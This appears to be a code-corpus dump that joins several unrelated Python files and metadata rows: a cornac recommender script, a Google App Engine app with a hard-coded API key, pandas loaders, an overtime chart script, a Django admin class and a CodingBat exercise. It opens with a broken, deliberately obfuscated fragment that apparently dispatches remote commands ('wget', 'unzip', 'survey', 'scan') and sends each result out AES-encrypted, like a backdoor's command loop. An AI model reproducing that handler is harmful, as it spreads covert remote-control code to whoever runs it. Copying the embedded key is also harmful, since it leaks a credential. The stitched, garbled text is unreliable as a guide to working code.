if bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd in hMargkvLtyzIZoANcjvhIxNcjAIxeVDMZwtdQwDpPJJZYHYclMUlcVTMIkIbcNkg:
bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd = gUiYBJALWmmOuonglVWanTdxRYRjJBSIcDlzJXVXExKaicMUqmjETSyMFtvseQju
elif bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd in kpKMRjNpRgIbYEwbIYtghxWLHelAttaoelHZZwdTvXaYJexnKvuBRumwtUkrfkcS:
hMargkvLtyzIZoANcjvhIxNcjAIxeVDMZwtdQwDpPJJZYHYclMUlcVTMIkIbcNkg = bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd
if hMargkvLtyzIZoANcjvhIxNcjAIxeVDMZwtdQwDpPJJZYHYclMUlcVTMIkIbcNkg in bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd:
bYeCxeFqaJjLVmArGEABZsaaZpiszwnfkMoZlOkdVOOnUctTmPRJQoAJjDSvCYkd = RuqumvwrCadVDbWmBgZlZjlOsOgAHIKrNVbsDSrqRjnvitKNOHrydDfyHwEaGAts
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = wget(gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX)
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.send(AES_encrypt(PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa))
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'unzip':
bLskLsJPaRMMpJTciYnHxWHQbdbgQXEjyIGYgvKFshNPhexPCPUOEzUvNttcNjUt = 'WxHkjsZZwTacuKTLqJuXCMPcgJcVAqsVXYZkswYBQNuLjFWLQIeaAVlZSjhyJCGd'
yHOCvqQThTlKbTzJQNqnPsROSwBKnNoKoiAbpabNNTDaeOhHdbZxiEyVQbStulGj = 'XHgXIIyRCXufbuaTuqSkhDLKzuHOpOkvXmdtnFSnbEeCkjOnRodfiOjYHuzyrSsd WxHkjsZZwTacuKTLqJuXCMPcgJcVAqsVXYZkswYBQNuLjFWLQIeaAVlZSjhyJCGd'
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = unzip(gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX)
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.send(AES_encrypt(PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa))
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'survey':
QzfmnQPSYoNFhjJJNpaHxaaciZoTDGWNMPmwUYrkqSswivJqUaWJApISvrUAjMts = 'zzOuJoshgQGsynuooilgxtzMWaMxsIiAWEgJUObCcivWUHoBbWjJyfKSGfehHSBI'
RtpsMPgDVfHICIVKaICdwnMSDjOTXAjOvUqLNACKhTgGlYzNqYLQXKjfxGyXDjBf = 'DhHHTZGDRHyhVAGSrDxuNcUmzbrJJekHRCPBTTuLRSZhYurYmZizgVuNLzfGEHZe'
UcKGQaDlYpnlHyeVeDVSZybucImfxozQTyeWwOIIVuNsaidpXbmlVRXDWxwwUwPo = 'SAJxLkDMIJsormhSYNaFENMfaDETWukviUsedvrRfMYkMFTpgwPhZyetwTozLTLW'
HcJMNxbAOkhvxNguhmiXNjSGzxCAkoMIZdAQgPbUzoNSktTXqqZoCmkFkUnhsdVj = 'UDzisOOrtjKpxPeaKaINBMtknjmMrFaFxDwygYwiueYwluzDZTNVrLKlQGARWeyk'
yymXVJfzcIfyEHJQRsXBXNdMwvCwhspwXQDxgewgcPrOZnvcjroAHTBUbFBIVksX = 'PoUUPKztKVVLkNuDOocWXzFWfDMrQLMDijEXBxyzLfCtSlcwqNmQkJGrKXubVNyd'
JOKtqyMcbxKtcAobyWCoGgtnMUlBVoUPyiJDtXivakEwFWlyGjkOokCoEhxJLDOO = 'VDqXjrZkuBEvNcxBAQQXVzAHyQCIdFsNelyiMCGrEMsDyXFRvigGzKoqpFVTJLzT'
if UcKGQaDlYpnlHyeVeDVSZybucImfxozQTyeWwOIIVuNsaidpXbmlVRXDWxwwUwPo == HcJMNxbAOkhvxNguhmiXNjSGzxCAkoMIZdAQgPbUzoNSktTXqqZoCmkFkUnhsdVj:
for JOKtqyMcbxKtcAobyWCoGgtnMUlBVoUPyiJDtXivakEwFWlyGjkOokCoEhxJLDOO in yymXVJfzcIfyEHJQRsXBXNdMwvCwhspwXQDxgewgcPrOZnvcjroAHTBUbFBIVksX:
if JOKtqyMcbxKtcAobyWCoGgtnMUlBVoUPyiJDtXivakEwFWlyGjkOokCoEhxJLDOO == HcJMNxbAOkhvxNguhmiXNjSGzxCAkoMIZdAQgPbUzoNSktTXqqZoCmkFkUnhsdVj:
yymXVJfzcIfyEHJQRsXBXNdMwvCwhspwXQDxgewgcPrOZnvcjroAHTBUbFBIVksX = QzfmnQPSYoNFhjJJNpaHxaaciZoTDGWNMPmwUYrkqSswivJqUaWJApISvrUAjMts
else:
HcJMNxbAOkhvxNguhmiXNjSGzxCAkoMIZdAQgPbUzoNSktTXqqZoCmkFkUnhsdVj = RtpsMPgDVfHICIVKaICdwnMSDjOTXAjOvUqLNACKhTgGlYzNqYLQXKjfxGyXDjBf
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = run(ifkyjfqMKsCDTTKFljvJpynmzoQOwTIGPtROJfuaHPXOZyRatKVogjTWNRvciIlg)
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.send(AES_encrypt(PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa))
elif DZMoUboPmwXCritJnDzYFKfmWMbOOqfXOzVxOcwVEVcsRxPYVCWClKNeuBzdMaJu == 'scan':
qrqqddyTUbAjnJQRtVlznntxrnfRPNfEMFtLhPjvGCriLaArIRvwOeJDoXOoBFMO = 'MjtUOwIbqULacngkNigVrJYLHMeSBZBYvCnybrGBNuwiFdAFECpGftsKqCwOPeBq'
VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf = 'XtflKNebDqTUpamhAEnZpgCRIzlQdACaQivCrszbVrKeHeDhqNAoqGmXEdyOkRze'
fnBssnvoIUKLCqrvXnWtXyfwpWsSpQCmMBcjNZxgJVEkSJYtPUaTFlHMtcsUdHVl = 'ixbPCrAfEoXOqcdpyhOIngiLyBeXTQIPsPUMSzLQzGcuOvysBCsIOTzmzxjorjtb'
tRsYRWWaNnZaIPzoNqTfiDoUwfvGpOTKwFhDGDpExXRZDZhKNDLtxoWgLliRpkPg = 'eYvxGvGCDUvikmWCQjvfNUnhaFlPlYTDThejoEjfVIBsIjKDokjBzCzvlIRzGqeH'
sLydzvVwtKjQXnnxDWNYaYYyOhGcfHBOSbusdTOYhRzqikyHmpQWbcCDhKTWzSNQ = 'pggLnzKXlsfkMAdSEzlCAphuMohbWqypTgRPCMqscsaocbLBXcrQlZrSjifArZSi'
wSmgHqNbxlhjmYkfuXOpKSVALUlXqUKcKjFoiffSXMzkvndyGIRRGTTDwOYMXxOY = 'EQoosVlbzczWVUhohlksTNSMvamPbgHDMPsPhgGreTKrMnfXjstVcEFMaZtPmHlv'
qhPqsFlqdsGeXFXuPdZjgVVGlSJCMtwnmyBrOCABWKHHcrTPYESURVJiWnliyzPr = [
'MjtUOwIbqULacngkNigVrJYLHMeSBZBYvCnybrGBNuwiFdAFECpGftsKqCwOPeBq',
'ixbPCrAfEoXOqcdpyhOIngiLyBeXTQIPsPUMSzLQzGcuOvysBCsIOTzmzxjorjtb',
'pggLnzKXlsfkMAdSEzlCAphuMohbWqypTgRPCMqscsaocbLBXcrQlZrSjifArZSi',
'QeUnPqGndTsDBnTbnMYpxRpaRbAzCqQxJOdgToxinOpBVWFZJcbkbZjuQwCAVLAH'
]
for qrqqddyTUbAjnJQRtVlznntxrnfRPNfEMFtLhPjvGCriLaArIRvwOeJDoXOoBFMO in wSmgHqNbxlhjmYkfuXOpKSVALUlXqUKcKjFoiffSXMzkvndyGIRRGTTDwOYMXxOY:
for VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf in fnBssnvoIUKLCqrvXnWtXyfwpWsSpQCmMBcjNZxgJVEkSJYtPUaTFlHMtcsUdHVl:
if tRsYRWWaNnZaIPzoNqTfiDoUwfvGpOTKwFhDGDpExXRZDZhKNDLtxoWgLliRpkPg == sLydzvVwtKjQXnnxDWNYaYYyOhGcfHBOSbusdTOYhRzqikyHmpQWbcCDhKTWzSNQ:
VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf = qrqqddyTUbAjnJQRtVlznntxrnfRPNfEMFtLhPjvGCriLaArIRvwOeJDoXOoBFMO
elif sLydzvVwtKjQXnnxDWNYaYYyOhGcfHBOSbusdTOYhRzqikyHmpQWbcCDhKTWzSNQ == VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf:
VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf = wSmgHqNbxlhjmYkfuXOpKSVALUlXqUKcKjFoiffSXMzkvndyGIRRGTTDwOYMXxOY
else:
sLydzvVwtKjQXnnxDWNYaYYyOhGcfHBOSbusdTOYhRzqikyHmpQWbcCDhKTWzSNQ = wSmgHqNbxlhjmYkfuXOpKSVALUlXqUKcKjFoiffSXMzkvndyGIRRGTTDwOYMXxOY
for VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf in qhPqsFlqdsGeXFXuPdZjgVVGlSJCMtwnmyBrOCABWKHHcrTPYESURVJiWnliyzPr:
fnBssnvoIUKLCqrvXnWtXyfwpWsSpQCmMBcjNZxgJVEkSJYtPUaTFlHMtcsUdHVl = VKQXZFTKIiabAWqGrjTkbwTUquYvYynorxNrGTKsUwYqtmHKuJvsZslLrrYgYSJf
PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak = single_host(gjydbwjOJAzCLnUbmdOxDXJdNCxvhMPgRpoErUpfUlgooWLdjzXISOyoGcWhAtwX)
gcqneiWdTJTmbHllbjseAaCIdVgDgAcjfXfaDPqlMasViVTZCJYctIwouGFEYqUk.send(AES_encrypt(PxWeovcUBkxkvAfvTVTIZIhTforucqsAyMmsBxnxvpmpgrUwrnDNHLqynQqmxjak, wQhPgGEpfaJcHTUwpSREwiCzpxprnWHNawdPXkWCbibJJRGKSxdZcJnuVYcEvpFa))
if __name__ == '__main__':
gbuyNrHfZPYjBqdXlOqIFbQrYLLAFwkYcvtGpNDGMBipYhVmoZZRbbwcYBszIEpb = 'sBdRRpkOKJJYIgeTkLMkTjFuvYvzpYpqauxOfMHilEshiMZZMgyUYIzQszcyjQvX'
seikgwnzTHwHPwktHYrqMmlXUtYiicrqXQdEadtEymMyRPOeOZFlkqYVlcTWhaFe()
| [
"noreply@github.com"
] | noreply@github.com |
8dbbb798fd7d365ab6925e56271b3e38fd9151e3 | d229480fb037442bfc2d895e300fdab89d06e1f6 | /examples/train_cornac.py | 739d5ecca174fe68cffed861aa5a7481900cda49 | [] | no_license | anonymcodes/t-vbr | 939c8eebed4e6ecbe4e85b26b296b5e16bb0b445 | c8d37aee05de5060a98fac74421a28db0a7eaa4c | refs/heads/master | 2023-08-09T01:55:12.295567 | 2020-12-03T02:06:18 | 2020-12-03T02:06:18 | 264,423,776 | 2 | 0 | null | 2023-07-23T17:09:20 | 2020-05-16T11:40:02 | Python | UTF-8 | Python | false | false | 6,934 | py | import numpy as np
import pandas as pd
import pickle
import argparse
import json
import torch.optim as optim
from torch import Tensor
from torch.utils.data import DataLoader
import torch
import torch.nn as nn
import torch.optim as optim
from tqdm import tqdm
from livelossplot import PlotLosses
import GPUtil
import os
import sys
from datetime import datetime
sys.path.append("../")
import random
import cornac
from cornac.eval_methods.base_method import BaseMethod
base_string = "abcdefghijklmnopqrstuvwxyz"
from scipy.sparse import csr_matrix
from beta_rec.utils.monitor import Monitor
from beta_rec.utils.common_util import save_to_csv
from beta_rec.utils import data_util
from beta_rec.utils import logger
import beta_rec.utils.constants as Constants
from beta_rec.datasets import data_load
import beta_rec.utils.evaluation as eval_model
import beta_rec.utils.constants as Constants
from scipy.sparse import csr_matrix
import pandas as pd
def parse_args():
    """Parse command-line arguments for the cornac training script.

    Only options the user explicitly supplies are later merged into the
    JSON configuration (see ``update_args``); everything else defaults to
    ``None`` so the config-file values win.

    Returns:
        argparse.Namespace: the parsed command-line arguments.
    """
    parser = argparse.ArgumentParser(description="Run cornac model..")
    # If the following settings are specified with command line,
    # these settings will be updated.
    parser.add_argument(
        "--config_file",
        default="../configs/cornac_default.json",
        nargs="?",
        type=str,
        help="Path of the JSON config file",
    )
    parser.add_argument(
        "--dataset",
        nargs="?",
        type=str,
        help="Options are: tafeng, dunnhunmby and instacart",
    )
    parser.add_argument(
        "--data_split",
        nargs="?",
        type=str,
        help="Options are: leave_one_out and temporal",
    )
    parser.add_argument(
        "--test_percent",
        nargs="?",
        type=float,
        help="Fraction of interactions held out for testing",
    )
    parser.add_argument(
        "--root_dir", nargs="?", type=str, help="working directory",
    )
    parser.add_argument(
        "--toy", nargs="?", type=int, help="use a toy (subsampled) dataset",
    )
    return parser.parse_args()
"""
update hyperparameters from command line
"""
def update_args(config, args):
    """Copy command-line options into ``config`` in place.

    Only options the user actually supplied (value is not ``None``) are
    written, so JSON-file defaults survive for everything else.

    Args:
        config (dict): configuration dict, updated in place.
        args (argparse.Namespace): parsed command-line arguments.
    """
    for k, v in vars(args).items():
        # ``is not None`` (identity), not ``!=``: an option value could
        # legitimately compare equal to None via a custom __eq__.
        if v is not None:
            config[k] = v
            print("Received parameters from command line:", k, v)
def my_eval(eval_data_df, model):
    """Score a trained cornac model on ``eval_data_df`` and persist metrics.

    Predictions are produced pairwise via ``model.score(user, item)`` for
    every row of the evaluation frame; ranking metrics (NDCG, precision,
    recall, MAP at k in {5, 10, 20}) are then computed with ``eval_model``
    and appended, together with the run config, to ``config["result_file"]``.

    Args:
        eval_data_df (pandas.DataFrame): evaluation interactions using the
            default user/item column names from ``Constants``.
        model: a fitted cornac recommender exposing ``score(user_idx, item_idx)``.
    """
    u_indices = eval_data_df[Constants.DEFAULT_USER_COL].to_numpy()
    i_indices = eval_data_df[Constants.DEFAULT_ITEM_COL].to_numpy()
    r_preds = np.fromiter(
        (
            model.score(user_idx, item_idx).item()
            for user_idx, item_idx in zip(u_indices, i_indices)
        ),
        # ``np.float`` was removed in NumPy 1.24; the builtin ``float``
        # is the documented replacement (float64 here).
        dtype=float,
        count=len(u_indices),
    )
    pred_df = pd.DataFrame(
        {
            Constants.DEFAULT_USER_COL: u_indices,
            Constants.DEFAULT_ITEM_COL: i_indices,
            Constants.DEFAULT_PREDICTION_COL: r_preds,
        }
    )
    result_dic = {}
    # Cut-offs to evaluate at. (The original guards coercing TOP_K to a
    # list and appending 10 were unreachable for this literal and were
    # removed.)
    TOP_K = [5, 10, 20]
    metrics = ["ndcg_at_k", "precision_at_k", "recall_at_k", "map_at_k"]
    for k in TOP_K:
        for metric in metrics:
            eval_metric = getattr(eval_model, metric)
            result_dic[metric + "@" + str(k)] = eval_metric(eval_data_df, pred_df, k=k)
    # Record the full run configuration alongside the metrics so each row of
    # the shared result CSV is self-describing. ``config`` is the
    # module-level dict built in __main__.
    result_dic.update(config)
    result_df = pd.DataFrame(result_dic, index=[0])
    save_to_csv(result_df, config["result_file"])
if __name__ == "__main__":
    # load config file from json
    # Command-line overrides (collected first) take precedence over the
    # values stored in the JSON config file.
    config = {}
    args = parse_args()
    update_args(config, args)
    with open(config["config_file"]) as config_params:
        print("loading config file", config["config_file"])
        json_config = json.load(config_params)
        # Command-line values win over file defaults.
        json_config.update(config)
        config = json_config
    root_dir = config["root_dir"]
    time_str = datetime.now().strftime("%Y%m%d_%H%M%S")
    # Per-run log file name encodes dataset, split strategy and timestamp.
    log_file = (
        root_dir
        + "logs/cornac"
        + "_"
        + config["dataset"]
        + "_"
        + config["data_split"]
        + time_str
    )
    # All models' evaluation rows are appended to this shared CSV
    # (consumed by my_eval).
    config["result_file"] = (
        root_dir
        + "results/cornac"
        + "_"
        + config["dataset"]
        + "_"
        + config["data_split"]
        + ".csv"
    )
    """
    init logger
    """
    logger.init_std_logger(log_file)
    # cornac.eval_methods.base_method.rating_eval = rating_eval
    # Load the built-in MovieLens 100K dataset (will be downloaded if not cached):
    # Here we are comparing Biased MF, PMF, and BPR:
    # pop = cornac.models.most_pop.recom_most_pop.MostPop(name="MostPop")
    # mf = cornac.models.MF(
    #     k=10, max_iter=25, learning_rate=0.01, lambda_reg=0.02, use_bias=True, seed=123
    # )
    # pmf = cornac.models.PMF(
    #     k=10, max_iter=100, learning_rate=0.001, lambda_reg=0.001, seed=123
    # )
    # bpr = cornac.models.BPR(
    #     k=10, max_iter=200, learning_rate=0.001, lambda_reg=0.01, seed=123
    # )
    # vaecf = cornac.models.vaecf.recom_vaecf.VAECF(
    #     name="VAECF",
    #     k=10,
    #     autoencoder_structure=[20],
    #     act_fn="tanh",
    #     likelihood="mult",
    #     n_epochs=100,
    #     batch_size=100,
    #     learning_rate=0.001,
    #     beta=1.0,
    #     trainable=True,
    #     verbose=False,
    #     seed=None,
    #     use_gpu=True,
    # )
    # nmf = cornac.models.NMF(
    #     k=15,
    #     max_iter=50,
    #     learning_rate=0.005,
    #     lambda_u=0.06,
    #     lambda_v=0.06,
    #     lambda_bu=0.02,
    #     lambda_bi=0.02,
    #     use_bias=False,
    #     verbose=True,
    #     seed=123,
    # )
    # Only NeuMF/NCF is currently enabled; the models above are kept for
    # reference and can be re-added to ``models`` below.
    neumf = cornac.models.ncf.recom_neumf.NeuMF(
        name="NCF",
        num_factors=8,
        layers=(32, 16, 8),
        act_fn="relu",
        reg_mf=0.0,
        reg_layers=(0.0, 0.0, 0.0, 0.0),
        num_epochs=20,
        batch_size=256,
        num_neg=4,
        lr=0.001,
        learner="adam",
        early_stopping=None,
        trainable=True,
        verbose=True,
        seed=None,
    )
    # models = [pop, mf, pmf, bpr, vaecf, nmf, neumf]
    models = [neumf]
    # add our own eval
    # Load the beta_rec dataset wrapper and translate its train split into
    # cornac's (users, items, ratings) tuple form.
    data = data_util.Dataset(config)
    num_users = data.n_users
    num_items = data.n_items
    uid_map = data.user2id
    iid_map = data.item2id
    train_uir_tuple = [
        data.train["col_user"].to_numpy(),
        data.train["col_item"].to_numpy(),
        data.train["col_rating"].to_numpy(),
    ]
    train_data = cornac.data.Dataset(
        num_users,
        num_items,
        uid_map,
        iid_map,
        train_uir_tuple,
        timestamps=None,
        seed=None,
    )
    # NOTE(review): data.test appears to be a list of test DataFrames;
    # only the first split is evaluated below — confirm against data_util.
    test_df_li = data.test
    for model in models:
        # Derive a model tag from the class name (e.g. "NeuMF") plus a
        # timestamp, for the result CSV.
        config["model"] = str(model.__class__).split(".")[-1].replace(">", "").strip(
            "'\""
        ) + datetime.now().strftime("_%Y%m%d_%H%M%S")
        model.fit(train_data)
        my_eval(test_df_li[0], model)
"your@email.com"
] | your@email.com |
90a2e90e2f2334cf65ff1b339145a6612a911fa6 | a7360f3dcb53ff1280941315a1afa555b4710c15 | /main.py | 7b334989a8aa43e4520006e668e47589438e2bb1 | [] | no_license | ONEKINGDOMS/personalZeng | 6e96f4fdfc6bace17305dcfc775851f6041221ca | 0ec09467de3b97079f8895f247cb24e15bd880c0 | refs/heads/master | 2021-01-23T16:23:12.980854 | 2017-06-04T07:20:59 | 2017-06-04T07:20:59 | 93,296,625 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,823 | py | # -*- coding:utf8 -*-
import os
import urllib
import re
import urllib2
import jinja2
import webapp2
from google.appengine.api import users
from google.appengine.ext import blobstore
from google.appengine.ext import ndb
from google.appengine.ext.webapp import blobstore_handlers
from google.appengine.ext.webapp.util import run_wsgi_app
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
DEFAULT_CATEGORY = 'all'
API_KEY = "AIzaSyAB9unkt1cak3vRY0_WEmf4UYrYzrHohKM"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
QUERY_TERM = "dog"
class Products(ndb.Model):
name = ndb.StringProperty(indexed=False)
content = ndb.StringProperty(indexed=False)
date = ndb.DateTimeProperty(auto_now_add=True)
exchange = ndb.StringProperty(indexed=False)
price = ndb.StringProperty(indexed=False)
connactway = ndb.StringProperty(indexed=False)
image = ndb.StringProperty(indexed=False)
category = ndb.StringProperty(indexed=True)
blob_key = ndb.BlobKeyProperty()
class MainPage(webapp2.RequestHandler):
def get(self):
template = JINJA_ENVIRONMENT.get_template('index.html')
self.response.write(template.render())
class ResumePage(webapp2.RequestHandler):
def get(self):
template = JINJA_ENVIRONMENT.get_template('resume.html')
self.response.write(template.render())
class DemoPage(webapp2.RequestHandler):
def get(self):
temple = JINJA_ENVIRONMENT.get_template('demo.html')
self.response.write(temple.render())
class Demoweather(webapp2.RequestHandler):
def get(self):
temple = JINJA_ENVIRONMENT.get_template('weather.html')
self.response.write(temple.render())
class PhotoUploadFormHandler(webapp2.RequestHandler):
def get(self):
upload_url = blobstore.create_upload_url('/upload_photo')
category = self.request.get('category', DEFAULT_CATEGORY)
products_query = Products.query(Products.category == category)
products = products_query.fetch(10)
template_values = {
'products': products,
'category': urllib.quote_plus(category),
'upload_url':upload_url,
}
template = JINJA_ENVIRONMENT.get_template('product.html')
self.response.write(template.render(template_values))
class PhotoUploadHandler(blobstore_handlers.BlobstoreUploadHandler):
def post(self):
try:
category = self.request.get('category')
upload = self.get_uploads()[0]
product = Products(blob_key=upload.key())
product.category = self.request.get('category')
product.name = self.request.get('name')
product.content = self.request.get('content')
product.exchange = self.request.get('exchange')
product.price = self.request.get('price')
product.connactway = self.request.get('connactway')
product.put()
except:
self.error(500)
finally:
query_params = {'category': category}
self.redirect('/goodchange?' + urllib.urlencode(query_params))
class ViewPhotoHandler(blobstore_handlers.BlobstoreDownloadHandler):
def get(self, photo_key):
if not blobstore.get(photo_key):
self.error(404)
else:
self.send_blob(photo_key)
class SearchResult(webapp2.RequestHandler):
def get(self):
videos =[]
template_values = { 'videos': videos}
self.response.headers['Content-type'] = 'text/html'
template = JINJA_ENVIRONMENT.get_template('video.html')
self.response.write(template.render(template_values))
# def post(self):
# title=self.request.get('title')
# search=urllib.quote_plus(title.encode("utf-8"))
# req = urllib2.Request("https://www.youtube.com/results?search_query="+search)
# res = urllib2.urlopen(req)
# data = res.read()
# reg = r'data-context-item-id="([a-zA-Z0-9].+?)"'
# videopatten = re.compile(reg)
# videos = re.findall(videopatten,data)
# video=[videos[0]]
# res.close()
# template_values = { 'videos': video}
# self.response.headers['Content-type'] = 'text/html'
# template = JINJA_ENVIRONMENT.get_template('video.html')
# self.response.write(template.render(template_values))
app = webapp2.WSGIApplication([('/', MainPage),
('/goodchange', PhotoUploadFormHandler), ('/demo', DemoPage), ('/weather', Demoweather),
('/upload_photo', PhotoUploadHandler), ('/view_photo/([^/]+)?', ViewPhotoHandler),('/search', SearchResult), ('/resume', ResumePage), ('/video', SearchResult),
], debug=True)
| [
"zenghongbin@zengdeMacBook-Pro.local"
] | zenghongbin@zengdeMacBook-Pro.local |
cf69051dcb9cad2c69de1b1e9becca99eb7e3308 | 37e29d87d1d620488e9969203f213aa9ee13ef7f | /tkm/load_data.py | ee5eb10cbd92642269e1f68239f7227b119061eb | [] | no_license | koji0000/machine-learning | 296aea642ab9a025fc9d9064a0f50b9d259a7812 | 4201765fff8ca75944511c90dbe2a6821160c0b9 | refs/heads/master | 2021-07-24T02:50:06.543463 | 2017-11-02T01:18:36 | 2017-11-02T01:18:36 | 109,202,230 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 598 | py | import pandas as pd
from logging import getLogger
TRAIN_DATA = '../input/train.csv'
TEST_DATA = '../input/test.csv'
logger = getLogger(__name__)
def read_csv(path):
logger.debug('enter')
df = pd.read_csv(path)
logger.debug('exit')
return df
def load_train_data():
logger.debug('enter')
df = read_csv(TRAIN_DATA)
logger.debug('exit')
return df
def load_test_data():
logger.debug('enter')
df = read_csv(TEST_DATA)
logger.debug('exit')
return df
if __name__ == '__main__':
print(load_train_data().head())
print(load_test_data().head()) | [
"nakashima@key-p.co.jp"
] | nakashima@key-p.co.jp |
905a7dce0baf7bd4ecf6823a6c1680a0a082533b | 7cb17f5819682463351593c54a00cfc2baccf562 | /main.py | acbc35421d9e6dce6cde2f4487fa53677553d1ee | [] | no_license | meganjacob/Overtime-Data-Analysis | 3fc91f36ea4aa3bc8ac33058f826927a998e80f9 | 91e9b8f527704674e226e06ff993574730a85d1e | refs/heads/master | 2022-06-18T00:42:24.141717 | 2020-05-05T22:46:23 | 2020-05-05T22:46:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 692 | py | import csv
import matplotlib.pyplot as plt
hqs = []
ot = []
st = []
with open ('set.csv') as d:
data = csv.DictReader(d)
for i in data:
h = i['Headquarter']
otf = float(i['Total OT\nHours'])
stf = float(i['ST\nHours'])
if h in hqs:
index = hqs.index(h)
ot[index] += otf
st[index] += stf
else:
hqs.append(i['Headquarter'])
ot.append(otf)
st.append(stf)
continue
new = zip(ot, st)
percent = []
for (o,s) in new:
try:
t = round((o/s)*100, 2)
except ZeroDivisionError:
t = 0
percent.append(t)
for i in range(len(hqs)):
print("{}: {}%".format(hqs[i], percent[i]))
plt.bar(hqs, percent)
plt.savefig("graph.png") | [
"meganjacob2004@yahoo.com"
] | meganjacob2004@yahoo.com |
24bd01eef13ac27c129556df9c4bdd7e0d6ad861 | 44b869c9ddcfd8afa429a6a4758c6acdac62f9c1 | /users/admin.py | c13af5a0c2a73efaf7790a0cc239c9c99a1fafdc | [] | no_license | paulitstep/blog-api | 7507394eb008c6c1bd30e5699bb33e9e37cfac52 | 5ce6d84495fa9b6d32b38d7d99412858ff3bc077 | refs/heads/main | 2023-04-06T12:56:00.364861 | 2021-04-16T09:28:09 | 2021-04-16T09:28:09 | 357,801,983 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from users.models import NewUser
class UserAdminConfig(UserAdmin):
model = NewUser
search_fields = ('email', 'user_name',)
list_filter = ('email', 'user_name', 'is_staff', 'is_active')
list_display = ('email', 'id', 'user_name', 'is_staff', 'is_active')
ordering = ('-start_date',)
fieldsets = (
(None, {'fields': ('email', 'user_name',)}),
('Permissions', {'fields': ('is_staff', 'is_active',)}),
('Personal', {'fields': ('about',)}),
)
add_fieldsets = (
(None, {
'classes': ('wide',),
'fields': ('email', 'user_name', 'password1', 'password2', 'is_staff', 'is_active'), }),
)
admin.site.register(NewUser, UserAdminConfig)
| [
"pasha-mo1@rambler.ru"
] | pasha-mo1@rambler.ru |
715abf20cea7f39f6f659e1cdcea9383ed413dc0 | 621aff67f5f89e04029ea326d09681fcf46290a2 | /CodingBatLogic-1/cigar_party.py | 79bcd7e857eda41041650777f605226f7f13fa96 | [] | no_license | raymondng1893/Python-CodingBatExercises | 6a24e7ea2f63b54e43eb3727eee35d1077d64d77 | 252588ddf6267f6dd82d56d0e7ac79c779f0dcbb | refs/heads/master | 2021-09-07T21:57:45.838250 | 2018-03-01T17:38:40 | 2018-03-01T17:38:40 | 109,044,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 613 | py | # When squirrels get together for a party, they like to have cigars. A squirrel party is successful when the number of cigars is between 40 and 60, inclusive. Unless it is the weekend, in which case there is no upper bound on the number of cigars. Return True if the party with the given values is successful, or False otherwise.
def cigar_party(cigars, is_weekend):
if is_weekend and cigars >= 40:
return True
elif not is_weekend and 40 <= cigars <= 60:
return True
return False
print(cigar_party(30, False))
print(cigar_party(50, False))
print(cigar_party(70, True))
| [
"noreply@github.com"
] | noreply@github.com |
